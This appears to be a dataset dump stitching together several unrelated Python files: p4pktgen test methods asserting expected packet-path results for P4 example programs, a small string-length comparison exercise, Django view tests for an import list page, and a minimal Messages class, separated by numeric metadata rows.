            ('start', 'parse_ethernet', 'parse_ipv6', 'parse_udp', 'sink', (u'node_2', (False, (u'demo9b.p4', 157, u'hdr.ipv6.version != 6'))), (u'node_3', (True, (u'demo9b.p4', 160, u'hdr.ethernet.srcAddr == 123456'))), (u'tbl_act', u'act')):
            TestPathResult.SUCCESS
        }
        assert results == expected_results
    def check_config_table(self):
        """Run p4pktgen on examples/config-table.json; paths where the
        config table hits NoAction (or the packet lacks IPv4) lead to
        uninitialized reads."""
        Config().load_test_defaults()
        results = process_json_file('examples/config-table.json')
        expected_results = {
            ('start', 'sink', (u'ingress.switch_config_params', u'ingress.set_config_parameters'), (u'ingress.mac_da', u'ingress.set_bd_dmac_intf')):
            TestPathResult.UNINITIALIZED_READ,
            ('start', 'sink', (u'ingress.switch_config_params', u'ingress.set_config_parameters'), (u'ingress.mac_da', u'ingress.my_drop')):
            TestPathResult.SUCCESS,
            ('start', 'sink', (u'ingress.switch_config_params', u'NoAction'), (u'ingress.mac_da', u'ingress.set_bd_dmac_intf')):
            TestPathResult.UNINITIALIZED_READ,
            ('start', 'sink', (u'ingress.switch_config_params', u'NoAction'), (u'ingress.mac_da', u'ingress.my_drop')):
            TestPathResult.UNINITIALIZED_READ,
            ('start', 'parse_ipv4', 'sink', (u'ingress.switch_config_params', u'ingress.set_config_parameters'), (u'ingress.mac_da', u'ingress.set_bd_dmac_intf')):
            TestPathResult.SUCCESS,
            ('start', 'parse_ipv4', 'sink', (u'ingress.switch_config_params', u'ingress.set_config_parameters'), (u'ingress.mac_da', u'ingress.my_drop')):
            TestPathResult.SUCCESS,
            ('start', 'parse_ipv4', 'sink', (u'ingress.switch_config_params', u'NoAction'), (u'ingress.mac_da', u'ingress.set_bd_dmac_intf')):
            TestPathResult.UNINITIALIZED_READ,
            ('start', 'parse_ipv4', 'sink', (u'ingress.switch_config_params', u'NoAction'), (u'ingress.mac_da', u'ingress.my_drop')):
            TestPathResult.UNINITIALIZED_READ
        }
        assert results == expected_results
    def check_demo1_rm_header(self):
        """Run p4pktgen on examples/demo1_rm_header.json; both paths
        write to a removed header and must be flagged as
        INVALID_HEADER_WRITE."""
        Config().load_test_defaults()
        results = process_json_file(
            'examples/demo1_rm_header.json')
        expected_results = {
            ('start', 'parse_ipv4', 'sink', (u'tbl_demo1_rm_header83', u'demo1_rm_header83')):
            TestPathResult.INVALID_HEADER_WRITE,
            ('start', 'sink', (u'tbl_demo1_rm_header83', u'demo1_rm_header83')):
            TestPathResult.INVALID_HEADER_WRITE
        }
        assert results == expected_results
    def check_add_remove_header(self):
        """Run p4pktgen on examples/add-remove-header.json and assert the
        classification of every path, covering header add/remove validity
        interactions."""
        Config().load_test_defaults()
        results = process_json_file(
            'examples/add-remove-header.json')
        expected_results = {
            ('start', 'parse_ipv4', 'sink', (u'node_2', (True, (u'add-remove-header.p4', 136, u'hdr.ipv4.isValid()'))), (u'ingress.ipv4_da_lpm', u'ingress.set_l2ptr'), (u'node_4', (True, (u'add-remove-header.p4', 138, u'!hdr.outer_ipv4.isValid()'))), (u'ingress.mac_da', u'ingress.set_bd_dmac_intf')):
            TestPathResult.SUCCESS,
            ('start', 'parse_ipv4', 'sink', (u'node_2', (True, (u'add-remove-header.p4', 136, u'hdr.ipv4.isValid()'))), (u'ingress.ipv4_da_lpm', u'ingress.set_l2ptr'), (u'node_4', (True, (u'add-remove-header.p4', 138, u'!hdr.outer_ipv4.isValid()'))), (u'ingress.mac_da', u'ingress.my_drop')):
            TestPathResult.SUCCESS,
            ('start', 'parse_ipv4', 'sink', (u'node_2', (True, (u'add-remove-header.p4', 136, u'hdr.ipv4.isValid()'))), (u'ingress.ipv4_da_lpm', u'ingress.set_l2ptr'), (u'node_4', (False, (u'add-remove-header.p4', 138, u'!hdr.outer_ipv4.isValid()')))):
            TestPathResult.NO_PACKET_FOUND,
            ('start', 'parse_ipv4', 'sink', (u'node_2', (True, (u'add-remove-header.p4', 136, u'hdr.ipv4.isValid()'))), (u'ingress.ipv4_da_lpm', u'ingress.my_drop'), (u'node_4', (True, (u'add-remove-header.p4', 138, u'!hdr.outer_ipv4.isValid()'))), (u'ingress.mac_da', u'ingress.set_bd_dmac_intf')):
            TestPathResult.UNINITIALIZED_READ,
            ('start', 'parse_ipv4', 'sink', (u'node_2', (True, (u'add-remove-header.p4', 136, u'hdr.ipv4.isValid()'))), (u'ingress.ipv4_da_lpm', u'ingress.my_drop'), (u'node_4', (True, (u'add-remove-header.p4', 138, u'!hdr.outer_ipv4.isValid()'))), (u'ingress.mac_da', u'ingress.my_drop')):
            TestPathResult.UNINITIALIZED_READ,
            ('start', 'parse_ipv4', 'sink', (u'node_2', (True, (u'add-remove-header.p4', 136, u'hdr.ipv4.isValid()'))), (u'ingress.ipv4_da_lpm', u'ingress.my_drop'), (u'node_4', (False, (u'add-remove-header.p4', 138, u'!hdr.outer_ipv4.isValid()')))):
            TestPathResult.NO_PACKET_FOUND,
            ('start', 'parse_ipv4', 'sink', (u'node_2', (True, (u'add-remove-header.p4', 136, u'hdr.ipv4.isValid()'))), (u'ingress.ipv4_da_lpm', u'ingress.add_outer_ipv4'), (u'node_4', (True, (u'add-remove-header.p4', 138, u'!hdr.outer_ipv4.isValid()')))):
            TestPathResult.NO_PACKET_FOUND,
            ('start', 'parse_ipv4', 'sink', (u'node_2', (True, (u'add-remove-header.p4', 136, u'hdr.ipv4.isValid()'))), (u'ingress.ipv4_da_lpm', u'ingress.add_outer_ipv4'), (u'node_4', (False, (u'add-remove-header.p4', 138, u'!hdr.outer_ipv4.isValid()')))):
            TestPathResult.SUCCESS,
            ('start', 'parse_ipv4', 'sink', (u'node_2', (False, (u'add-remove-header.p4', 136, u'hdr.ipv4.isValid()')))):
            TestPathResult.NO_PACKET_FOUND,
            ('start', 'sink', (u'node_2', (True, (u'add-remove-header.p4', 136, u'hdr.ipv4.isValid()')))):
            TestPathResult.NO_PACKET_FOUND,
            ('start', 'sink', (u'node_2', (False, (u'add-remove-header.p4', 136, u'hdr.ipv4.isValid()')))):
            TestPathResult.SUCCESS
        }
        assert results == expected_results
    def check_checksum_ipv4_with_options(self):
        """Run p4pktgen on examples/checksum-ipv4-with-options.json and
        assert the classification of every path."""
        Config().load_test_defaults()
        # This test case exercises variable-length extract, lookahead,
        # and verify statements in the parser.
        results = process_json_file(
            'examples/checksum-ipv4-with-options.json')
        expected_results = {
            ('start', u'parse_ipv4', u'parse_tcp', 'sink', (u'node_2', (True, (u'checksum-ipv4-with-options.p4', 125, u'hdr.ipv4.isValid() && hdr.tcp.isValid()'))), (u'node_3', (True, (u'checksum-ipv4-with-options.p4', 130, u'hdr.ipv4.ihl == 14')))):
            TestPathResult.SUCCESS,
            ('start', u'parse_ipv4', u'parse_tcp', 'sink', (u'node_2', (True, (u'checksum-ipv4-with-options.p4', 125, u'hdr.ipv4.isValid() && hdr.tcp.isValid()'))), (u'node_3', (False, (u'checksum-ipv4-with-options.p4', 130, u'hdr.ipv4.ihl == 14'))), (u'cIngress.guh', u'cIngress.foo')):
            TestPathResult.SUCCESS,
            ('start', u'parse_ipv4', u'parse_tcp', 'sink', (u'node_2', (False, (u'checksum-ipv4-with-options.p4', 125, u'hdr.ipv4.isValid() && hdr.tcp.isValid()')))):
            TestPathResult.NO_PACKET_FOUND,
            ('start', u'parse_ipv4', 'sink', (u'node_2', (True, (u'checksum-ipv4-with-options.p4', 125, u'hdr.ipv4.isValid() && hdr.tcp.isValid()')))):
            TestPathResult.NO_PACKET_FOUND,
            ('start', u'parse_ipv4', 'sink', (u'node_2', (False, (u'checksum-ipv4-with-options.p4', 125, u'hdr.ipv4.isValid() && hdr.tcp.isValid()')))):
            TestPathResult.SUCCESS,
            ('start', 'sink', (u'node_2', (True, (u'checksum-ipv4-with-options.p4', 125, u'hdr.ipv4.isValid() && hdr.tcp.isValid()')))):
            TestPathResult.NO_PACKET_FOUND,
            ('start', 'sink', (u'node_2', (False, (u'checksum-ipv4-with-options.p4', 125, u'hdr.ipv4.isValid() && hdr.tcp.isValid()')))):
            TestPathResult.SUCCESS
        }
        assert results == expected_results
    def check_parser_impossible_transitions(self):
        """Run p4pktgen on examples/parser-impossible-transitions.json
        and assert the classification of every path."""
        Config().load_test_defaults()
        # This test case has at least one parser path that is
        # impossible to traverse, and several that are possible that,
        # when taken, make certain paths through ingress impossible.
        # Note that there are no test cases containing the state
        # parse_unreachable_state in the parser paths.
        results = process_json_file(
            'examples/parser-impossible-transitions.json')
        expected_results = {
            ('start', 'parse_good', 'sink', (u'node_2', (False, (u'parser-impossible-transitions.p4', 92, u'meta.fwd_metadata.parse_status == 0')))):
            TestPathResult.NO_PACKET_FOUND,
            ('start', 'parse_good', 'sink', (u'node_2', (True, (u'parser-impossible-transitions.p4', 92, u'meta.fwd_metadata.parse_status == 0'))), (u'node_3', (False, (u'parser-impossible-transitions.p4', 93, u'hdr.ethernet.etherType_lsb == 4')))):
            TestPathResult.NO_PACKET_FOUND,
            ('start', 'parse_good', 'sink', (u'node_2', (True, (u'parser-impossible-transitions.p4', 92, u'meta.fwd_metadata.parse_status == 0'))), (u'node_3', (True, (u'parser-impossible-transitions.p4', 93, u'hdr.ethernet.etherType_lsb == 4'))), (u'tbl_parserimpossibletransitions94', u'parserimpossibletransitions94')):
            TestPathResult.SUCCESS,
            ('start', 'parse_bad4', 'sink', (u'node_2', (False, (u'parser-impossible-transitions.p4', 92, u'meta.fwd_metadata.parse_status == 0'))), (u'node_6', (False, (u'parser-impossible-transitions.p4', 99, u'meta.fwd_metadata.parse_status <= 4')))):
            TestPathResult.NO_PACKET_FOUND,
            ('start', 'parse_bad4', 'sink', (u'node_2', (False, (u'parser-impossible-transitions.p4', 92, u'meta.fwd_metadata.parse_status == 0'))), (u'node_6', (True, (u'parser-impossible-transitions.p4', 99, u'meta.fwd_metadata.parse_status <= 4'))), (u'tbl_parserimpossibletransitions100', u'parserimpossibletransitions100')):
            TestPathResult.SUCCESS,
            ('start', 'parse_bad4', 'sink', (u'node_2', (True, (u'parser-impossible-transitions.p4', 92, u'meta.fwd_metadata.parse_status == 0')))):
            TestPathResult.NO_PACKET_FOUND,
            ('start', 'parse_bad3', 'sink', (u'node_2', (False, (u'parser-impossible-transitions.p4', 92, u'meta.fwd_metadata.parse_status == 0'))), (u'node_6', (False, (u'parser-impossible-transitions.p4', 99, u'meta.fwd_metadata.parse_status <= 4')))):
            TestPathResult.NO_PACKET_FOUND,
            ('start', 'parse_bad3', 'sink', (u'node_2', (False, (u'parser-impossible-transitions.p4', 92, u'meta.fwd_metadata.parse_status == 0'))), (u'node_6', (True, (u'parser-impossible-transitions.p4', 99, u'meta.fwd_metadata.parse_status <= 4'))), (u'tbl_parserimpossibletransitions100', u'parserimpossibletransitions100')):
            TestPathResult.SUCCESS,
            ('start', 'parse_bad3', 'sink', (u'node_2', (True, (u'parser-impossible-transitions.p4', 92, u'meta.fwd_metadata.parse_status == 0')))):
            TestPathResult.NO_PACKET_FOUND,
            ('start', 'parse_bad2', 'sink', (u'node_2', (False, (u'parser-impossible-transitions.p4', 92, u'meta.fwd_metadata.parse_status == 0'))), (u'node_6', (False, (u'parser-impossible-transitions.p4', 99, u'meta.fwd_metadata.parse_status <= 4')))):
            TestPathResult.NO_PACKET_FOUND,
            ('start', 'parse_bad2', 'sink', (u'node_2', (False, (u'parser-impossible-transitions.p4', 92, u'meta.fwd_metadata.parse_status == 0'))), (u'node_6', (True, (u'parser-impossible-transitions.p4', 99, u'meta.fwd_metadata.parse_status <= 4'))), (u'tbl_parserimpossibletransitions100', u'parserimpossibletransitions100')):
            TestPathResult.SUCCESS,
            ('start', 'parse_bad2', 'sink', (u'node_2', (True, (u'parser-impossible-transitions.p4', 92, u'meta.fwd_metadata.parse_status == 0')))):
            TestPathResult.NO_PACKET_FOUND,
            ('start', 'parse_bad1', 'sink', (u'node_2', (False, (u'parser-impossible-transitions.p4', 92, u'meta.fwd_metadata.parse_status == 0'))), (u'node_6', (False, (u'parser-impossible-transitions.p4', 99, u'meta.fwd_metadata.parse_status <= 4')))):
            TestPathResult.NO_PACKET_FOUND,
            ('start', 'parse_bad1', 'sink', (u'node_2', (False, (u'parser-impossible-transitions.p4', 92, u'meta.fwd_metadata.parse_status == 0'))), (u'node_6', (True, (u'parser-impossible-transitions.p4', 99, u'meta.fwd_metadata.parse_status <= 4'))), (u'tbl_parserimpossibletransitions100', u'parserimpossibletransitions100')):
            TestPathResult.SUCCESS,
            ('start', 'parse_bad1', 'sink', (u'node_2', (True, (u'parser-impossible-transitions.p4', 92, u'meta.fwd_metadata.parse_status == 0')))):
            TestPathResult.NO_PACKET_FOUND
        }
        assert results == expected_results
def check_parser_impossible_transitions2_with_epl(self):
    """Check p4pktgen path results for parser-impossible-transitions2.json.

    Runs with ``no_packet_length_errs=False``, i.e. packet-length error
    checking enabled ("epl" in the method name presumably abbreviates
    this mode — TODO confirm against the test framework's naming).

    Each key in ``expected_results`` is a full path through the program:
    the leading strings are parser states ('start', 'parse_h5', ...,
    'sink'), followed by control-flow tuples of the form
    ``(node_name, (branch_taken, (source_file, line, condition_text)))``
    and table/action pairs ``(table_name, action_name)``.  The value is
    the result p4pktgen is expected to produce for that path.
    """
    Config().load_test_defaults(no_packet_length_errs=False)
    # Similar to the previous test case, this test case has
    # several parser paths that are impossible to traverse, and
    # several that are possible.
    results = process_json_file(
        'examples/parser-impossible-transitions2.json')
    # Paths that contradict themselves (e.g. a header parsed but then
    # found invalid) are expected to yield NO_PACKET_FOUND; consistent
    # paths yield SUCCESS.
    expected_results = {
        ('start', 'sink', (u'node_2', (False, (u'parser-impossible-transitions2.p4', 110, u'hdr.ethernet.isValid()')))):
        TestPathResult.SUCCESS,
        ('start', 'sink', (u'node_2', (True, (u'parser-impossible-transitions2.p4', 110, u'hdr.ethernet.isValid()')))):
        TestPathResult.NO_PACKET_FOUND,
        ('start', 'parse_h5', 'sink', (u'node_2', (False, (u'parser-impossible-transitions2.p4', 110, u'hdr.ethernet.isValid()')))):
        TestPathResult.NO_PACKET_FOUND,
        ('start', 'parse_h5', 'sink', (u'node_2', (True, (u'parser-impossible-transitions2.p4', 110, u'hdr.ethernet.isValid()'))), (u'tbl_parserimpossibletransitions2l111', u'parserimpossibletransitions2l111'), (u'node_4', (False, (u'parser-impossible-transitions2.p4', 112, u'hdr.h1.isValid()'))), (u'node_6', (False, (u'parser-impossible-transitions2.p4', 114, u'hdr.h5.isValid()'))), (u'node_8', (False, (u'parser-impossible-transitions2.p4', 116, u'hdr.h2.isValid() || hdr.h3.isValid() || hdr.h4.isValid()'))), (u'node_15', (False, (u'parser-impossible-transitions2.p4', 126, u'hdr.ethernet.dstAddr == 0xffffffff')))):
        TestPathResult.NO_PACKET_FOUND,
        ('start', 'parse_h5', 'sink', (u'node_2', (True, (u'parser-impossible-transitions2.p4', 110, u'hdr.ethernet.isValid()'))), (u'tbl_parserimpossibletransitions2l111', u'parserimpossibletransitions2l111'), (u'node_4', (False, (u'parser-impossible-transitions2.p4', 112, u'hdr.h1.isValid()'))), (u'node_6', (False, (u'parser-impossible-transitions2.p4', 114, u'hdr.h5.isValid()'))), (u'node_8', (False, (u'parser-impossible-transitions2.p4', 116, u'hdr.h2.isValid() || hdr.h3.isValid() || hdr.h4.isValid()'))), (u'node_15', (True, (u'parser-impossible-transitions2.p4', 126, u'hdr.ethernet.dstAddr == 0xffffffff'))), (u'tbl_parserimpossibletransitions2l130', u'parserimpossibletransitions2l130')):
        TestPathResult.SUCCESS,
        ('start', 'parse_h5', 'sink', (u'node_2', (True, (u'parser-impossible-transitions2.p4', 110, u'hdr.ethernet.isValid()'))), (u'tbl_parserimpossibletransitions2l111', u'parserimpossibletransitions2l111'), (u'node_4', (False, (u'parser-impossible-transitions2.p4', 112, u'hdr.h1.isValid()'))), (u'node_6', (False, (u'parser-impossible-transitions2.p4', 114, u'hdr.h5.isValid()'))), (u'node_8', (True, (u'parser-impossible-transitions2.p4', 116, u'hdr.h2.isValid() || hdr.h3.isValid() || hdr.h4.isValid()')))):
        TestPathResult.NO_PACKET_FOUND,
        ('start', 'parse_h5', 'sink', (u'node_2', (True, (u'parser-impossible-transitions2.p4', 110, u'hdr.ethernet.isValid()'))), (u'tbl_parserimpossibletransitions2l111', u'parserimpossibletransitions2l111'), (u'node_4', (False, (u'parser-impossible-transitions2.p4', 112, u'hdr.h1.isValid()'))), (u'node_6', (True, (u'parser-impossible-transitions2.p4', 114, u'hdr.h5.isValid()')))):
        TestPathResult.NO_PACKET_FOUND,
        ('start', 'parse_h5', 'sink', (u'node_2', (True, (u'parser-impossible-transitions2.p4', 110, u'hdr.ethernet.isValid()'))), (u'tbl_parserimpossibletransitions2l111', u'parserimpossibletransitions2l111'), (u'node_4', (True, (u'parser-impossible-transitions2.p4', 112, u'hdr.h1.isValid()')))):
        TestPathResult.NO_PACKET_FOUND,
        ('start', 'parse_h5', 'sink', (u'node_2', (True, (u'parser-impossible-transitions2.p4', 110, u'hdr.ethernet.isValid()'))), (u'tbl_parserimpossibletransitions2l111', u'parserimpossibletransitions2l111'), (u'node_4', (False, (u'parser-impossible-transitions2.p4', 112, u'hdr.h1.isValid()'))), (u'node_6', (False, (u'parser-impossible-transitions2.p4', 114, u'hdr.h5.isValid()')))):
        TestPathResult.NO_PACKET_FOUND,
        ('start', 'parse_h5', 'sink', (u'node_2', (True, (u'parser-impossible-transitions2.p4', 110, u'hdr.ethernet.isValid()'))), (u'tbl_parserimpossibletransitions2l111', u'parserimpossibletransitions2l111'), (u'node_4', (False, (u'parser-impossible-transitions2.p4', 112, u'hdr.h1.isValid()'))), (u'node_6', (True, (u'parser-impossible-transitions2.p4', 114, u'hdr.h5.isValid()'))), (u'tbl_parserimpossibletransitions2l115', u'parserimpossibletransitions2l115'), (u'node_15', (False, (u'parser-impossible-transitions2.p4', 126, u'hdr.ethernet.dstAddr == 0xffffffff'))), (u'tbl_parserimpossibletransitions2l132', u'parserimpossibletransitions2l132')):
        TestPathResult.SUCCESS,
        ('start', 'parse_h5', 'sink', (u'node_2', (True, (u'parser-impossible-transitions2.p4', 110, u'hdr.ethernet.isValid()'))), (u'tbl_parserimpossibletransitions2l111', u'parserimpossibletransitions2l111'), (u'node_4', (False, (u'parser-impossible-transitions2.p4', 112, u'hdr.h1.isValid()'))), (u'node_6', (True, (u'parser-impossible-transitions2.p4', 114, u'hdr.h5.isValid()'))), (u'tbl_parserimpossibletransitions2l115', u'parserimpossibletransitions2l115'), (u'node_15', (True, (u'parser-impossible-transitions2.p4', 126, u'hdr.ethernet.dstAddr == 0xffffffff')))):
        TestPathResult.NO_PACKET_FOUND,
        ('start', 'parse_h1', 'sink', (u'node_2', (False, (u'parser-impossible-transitions2.p4', 110, u'hdr.ethernet.isValid()')))):
        TestPathResult.NO_PACKET_FOUND,
        ('start', 'parse_h1', 'sink', (u'node_2', (True, (u'parser-impossible-transitions2.p4', 110, u'hdr.ethernet.isValid()'))), (u'tbl_parserimpossibletransitions2l111', u'parserimpossibletransitions2l111'), (u'node_4', (False, (u'parser-impossible-transitions2.p4', 112, u'hdr.h1.isValid()'))), (u'node_6', (False, (u'parser-impossible-transitions2.p4', 114, u'hdr.h5.isValid()'))), (u'node_8', (False, (u'parser-impossible-transitions2.p4', 116, u'hdr.h2.isValid() || hdr.h3.isValid() || hdr.h4.isValid()'))), (u'node_15', (False, (u'parser-impossible-transitions2.p4', 126, u'hdr.ethernet.dstAddr == 0xffffffff')))):
        TestPathResult.NO_PACKET_FOUND,
        ('start', 'parse_h1', 'sink', (u'node_2', (True, (u'parser-impossible-transitions2.p4', 110, u'hdr.ethernet.isValid()'))), (u'tbl_parserimpossibletransitions2l111', u'parserimpossibletransitions2l111'), (u'node_4', (False, (u'parser-impossible-transitions2.p4', 112, u'hdr.h1.isValid()'))), (u'node_6', (False, (u'parser-impossible-transitions2.p4', 114, u'hdr.h5.isValid()'))), (u'node_8', (False, (u'parser-impossible-transitions2.p4', 116, u'hdr.h2.isValid() || hdr.h3.isValid() || hdr.h4.isValid()'))), (u'node_15', (True, (u'parser-impossible-transitions2.p4', 126, u'hdr.ethernet.dstAddr == 0xffffffff'))), (u'tbl_parserimpossibletransitions2l130', u'parserimpossibletransitions2l130')):
        TestPathResult.SUCCESS,
        ('start', 'parse_h1', 'sink', (u'node_2', (True, (u'parser-impossible-transitions2.p4', 110, u'hdr.ethernet.isValid()'))), (u'tbl_parserimpossibletransitions2l111', u'parserimpossibletransitions2l111'), (u'node_4', (False, (u'parser-impossible-transitions2.p4', 112, u'hdr.h1.isValid()'))), (u'node_6', (False, (u'parser-impossible-transitions2.p4', 114, u'hdr.h5.isValid()'))), (u'node_8', (True, (u'parser-impossible-transitions2.p4', 116, u'hdr.h2.isValid() || hdr.h3.isValid() || hdr.h4.isValid()')))):
        TestPathResult.NO_PACKET_FOUND,
        ('start', 'parse_h1', 'sink', (u'node_2', (True, (u'parser-impossible-transitions2.p4', 110, u'hdr.ethernet.isValid()'))), (u'tbl_parserimpossibletransitions2l111', u'parserimpossibletransitions2l111'), (u'node_4', (False, (u'parser-impossible-transitions2.p4', 112, u'hdr.h1.isValid()'))), (u'node_6', (True, (u'parser-impossible-transitions2.p4', 114, u'hdr.h5.isValid()')))):
        TestPathResult.NO_PACKET_FOUND,
        ('start', 'parse_h1', 'sink', (u'node_2', (True, (u'parser-impossible-transitions2.p4', 110, u'hdr.ethernet.isValid()'))), (u'tbl_parserimpossibletransitions2l111', u'parserimpossibletransitions2l111'), (u'node_4', (True, (u'parser-impossible-transitions2.p4', 112, u'hdr.h1.isValid()')))):
        TestPathResult.NO_PACKET_FOUND,
        ('start', 'parse_h1', 'sink', (u'node_2', (True, (u'parser-impossible-transitions2.p4', 110, u'hdr.ethernet.isValid()'))), (u'tbl_parserimpossibletransitions2l111', u'parserimpossibletransitions2l111'), (u'node_4', (False, (u'parser-impossible-transitions2.p4', 112, u'hdr.h1.isValid()')))):
        TestPathResult.NO_PACKET_FOUND,
        ('start', 'parse_h1', 'sink', (u'node_2', (True, (u'parser-impossible-transitions2.p4', 110, u'hdr.ethernet.isValid()'))), (u'tbl_parserimpossibletransitions2l111', u'parserimpossibletransitions2l111'), (u'node_4', (True, (u'parser-impossible-transitions2.p4', 112, u'hdr.h1.isValid()'))), (u'tbl_parserimpossibletransitions2l113', u'parserimpossibletransitions2l113'), (u'node_15', (False, (u'parser-impossible-transitions2.p4', 126, u'hdr.ethernet.dstAddr == 0xffffffff'))), (u'tbl_parserimpossibletransitions2l132', u'parserimpossibletransitions2l132')):
        TestPathResult.SUCCESS,
        ('start', 'parse_h1', 'sink', (u'node_2', (True, (u'parser-impossible-transitions2.p4', 110, u'hdr.ethernet.isValid()'))), (u'tbl_parserimpossibletransitions2l111', u'parserimpossibletransitions2l111'), (u'node_4', (True, (u'parser-impossible-transitions2.p4', 112, u'hdr.h1.isValid()'))), (u'tbl_parserimpossibletransitions2l113', u'parserimpossibletransitions2l113'), (u'node_15', (True, (u'parser-impossible-transitions2.p4', 126, u'hdr.ethernet.dstAddr == 0xffffffff')))):
        TestPathResult.NO_PACKET_FOUND
    }
    assert results == expected_results
# Fill in expected results for this test case, and change name to
# have prefix 'check_' instead of 'xfail_', after p4pktgen has
# been modified to generate correct results for it. It generates
# incorrect results for this program now, because p4pktgen does
# not correctly handle multiple possible transitions from parser
# state A to parser state B.
def xfail_parser_parallel_paths(self):
    """Expected-failure placeholder for the parser-parallel-paths program."""
    Config().load_test_defaults()
    actual = process_json_file('examples/parser-parallel-paths.json')
    # No expected entries have been filled in yet (see the note above
    # this method), so any non-empty result set fails the comparison.
    expected = {}
    assert actual == expected
| 108.358491
| 705
| 0.648616
| 4,598
| 34,458
| 4.674859
| 0.048282
| 0.040475
| 0.068016
| 0.037683
| 0.947197
| 0.942824
| 0.939474
| 0.929286
| 0.911514
| 0.903326
| 0
| 0.058214
| 0.151518
| 34,458
| 317
| 706
| 108.700315
| 0.676985
| 0.02461
| 0
| 0.494774
| 0
| 0
| 0.503111
| 0.25419
| 0
| 0
| 0.002381
| 0
| 0.038328
| 1
| 0.038328
| false
| 0
| 0.010453
| 0
| 0.052265
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0598fe2682b67df77f4bb97e5b010d1030e79a6c
| 287
|
py
|
Python
|
Preview Materials/Answers/prob_p21.py
|
WHU-Tan/NUS_AIWorkshop_2020_Summer
|
1a047884547b433816403883f384d18d56012978
|
[
"BSD-4-Clause-UC"
] | null | null | null |
Preview Materials/Answers/prob_p21.py
|
WHU-Tan/NUS_AIWorkshop_2020_Summer
|
1a047884547b433816403883f384d18d56012978
|
[
"BSD-4-Clause-UC"
] | null | null | null |
Preview Materials/Answers/prob_p21.py
|
WHU-Tan/NUS_AIWorkshop_2020_Summer
|
1a047884547b433816403883f384d18d56012978
|
[
"BSD-4-Clause-UC"
] | null | null | null |
def compare_length(s, a):
    """Compare len(s) against the integer a.

    Returns the four comparison results [len > a, len >= a, len == a,
    len != a] as booleans, in the order the original script printed
    them.  Printing a bool yields 'True'/'False', exactly matching the
    string literals the original four if/else blocks emitted.
    """
    n = len(s)
    return [n > a, n >= a, n == a, n != a]


def main():
    """Read a string and an integer from stdin, print the comparisons."""
    s = input()
    a = int(input())
    for result in compare_length(s, a):
        print(result)


# Guarded entry point: importing this module no longer blocks on stdin,
# while `python prob_p21.py` behaves exactly as before.
if __name__ == "__main__":
    main()
| 11.958333
| 19
| 0.498258
| 40
| 287
| 3.575
| 0.275
| 0.167832
| 0.195804
| 0.335664
| 0.839161
| 0.839161
| 0.839161
| 0.839161
| 0.839161
| 0.839161
| 0
| 0
| 0.271777
| 287
| 24
| 20
| 11.958333
| 0.684211
| 0
| 0
| 0.631579
| 0
| 0
| 0.135849
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.421053
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 9
|
557239565601863d27dc77377519c9813c0ce578
| 399
|
py
|
Python
|
src/import_list_if/tests/test_views.py
|
iplweb/django-bpp
|
85f183a99d8d5027ae4772efac1e4a9f21675849
|
[
"BSD-3-Clause"
] | 1
|
2017-04-27T19:50:02.000Z
|
2017-04-27T19:50:02.000Z
|
src/import_list_if/tests/test_views.py
|
mpasternak/django-bpp
|
434338821d5ad1aaee598f6327151aba0af66f5e
|
[
"BSD-3-Clause"
] | 41
|
2019-11-07T00:07:02.000Z
|
2022-02-27T22:09:39.000Z
|
src/import_list_if/tests/test_views.py
|
iplweb/bpp
|
f027415cc3faf1ca79082bf7bacd4be35b1a6fdf
|
[
"BSD-3-Clause"
] | null | null | null |
from django.urls import reverse
def test_ListaImportowView_link(admin_app):
    """The import_list_if index page links to a downloadable template file."""
    index_page = admin_app.get(reverse("import_list_if:index"))
    # Follow the "download template file" link (Polish link text).
    template_page = index_page.click("pobierz plik wzorcowy")
    assert template_page.status_code == 200
def test_NowyImportView_link(admin_app):
    """The import_list_if "new import" page links to a downloadable template file."""
    new_import_page = admin_app.get(reverse("import_list_if:new"))
    # Follow the "download template file" link (Polish link text).
    template_page = new_import_page.click("pobierz plik wzorcowy")
    assert template_page.status_code == 200
| 28.5
| 57
| 0.741855
| 57
| 399
| 4.947368
| 0.45614
| 0.113475
| 0.085106
| 0.113475
| 0.716312
| 0.716312
| 0.716312
| 0.716312
| 0.716312
| 0.716312
| 0
| 0.017699
| 0.150376
| 399
| 13
| 58
| 30.692308
| 0.814159
| 0
| 0
| 0.444444
| 0
| 0
| 0.200501
| 0
| 0
| 0
| 0
| 0
| 0.222222
| 1
| 0.222222
| false
| 0
| 0.555556
| 0
| 0.777778
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
55b908ad13cfedbd3c3c113c84dc81404dddabf2
| 204
|
py
|
Python
|
app/core/messages.py
|
Zadigo/ze_mailer
|
1398a84cb8e836637a2ad72aef2f6f417c00b14e
|
[
"MIT"
] | 1
|
2020-06-30T21:06:02.000Z
|
2020-06-30T21:06:02.000Z
|
app/core/messages.py
|
Zadigo/ze_mailer
|
1398a84cb8e836637a2ad72aef2f6f417c00b14e
|
[
"MIT"
] | null | null | null |
app/core/messages.py
|
Zadigo/ze_mailer
|
1398a84cb8e836637a2ad72aef2f6f417c00b14e
|
[
"MIT"
] | null | null | null |
class Messages:
    """Base message wrapper.

    Stores a payload and renders it as '[ClassName]: payload', so
    subclasses automatically show their own name in the prefix.
    """

    def __init__(self, message):
        # Keep the payload as-is; __str__ converts it lazily.
        self.message = message

    def __str__(self):
        # !s forces str() conversion, matching the original %s formatting.
        return f'[{type(self).__name__}]: {self.message!s}'
class Info(Messages):
    # Informational message type; inherits formatting from Messages, so
    # str(Info("x")) renders as "[Info]: x" (tag comes from the class name).
    pass
| 20.4
| 67
| 0.627451
| 24
| 204
| 4.666667
| 0.5
| 0.294643
| 0
| 0
| 0
| 0
| 0
